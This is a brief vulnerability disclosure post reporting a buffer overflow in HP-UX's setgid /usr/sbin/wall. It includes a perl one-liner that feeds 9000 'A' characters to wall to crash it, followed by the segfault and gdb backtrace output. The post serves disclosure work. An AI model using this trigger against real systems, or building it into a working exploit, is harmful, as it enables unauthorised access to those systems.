Hi all, after looking to check if this had been reported before I couldn't find anything, so here's my two cents: HPUX /usr/sbin/wall Buffer Overflow. bash-2.04$ ls -las /usr/sbin/wall 40 -r-xr-sr-x 1 bin tty 20480 Nov 7 1997 /usr/sbin/wall Wall on HPUX works in the following way: echo "Something to Say" > file wall file The problem arises when we place 9000 A's into the file to be broadcast by the wall program. (Tested on HPUX 11.11) perl -e 'print "A" x 9000' > /tmp/out /usr/sbin/wall /tmp/out Memory fault (Tested on HPUX 11.00) perl -e 'print "A" x 9000' > /tmp/out /usr/sbin/wall /tmp/out bash-2.04$ /usr/sbin/wall /tmp/out Segmentation fault Looking at the registers, we can see: Program received signal SIGSEGV, Segmentation fault. 0x7f779c08 in strcat () from /usr/lib/libc.2 (gdb) bt 7f779c08 in strcat () from /usr/lib/libc.2 #1 0x34dc in ?? () #2 0x34dc in ?? () #3 0x34dc in ?? () #4 0x34dc in ?? () Error accessing memory address 0xffffffff: Bad address. etc.. etc The wall binary has Set Group ID of tty, so not a huge problem, but even so - still a security risk. Regards, uk2sec Memebers; eip, c0w uk2sec@oakey.no-ip.com
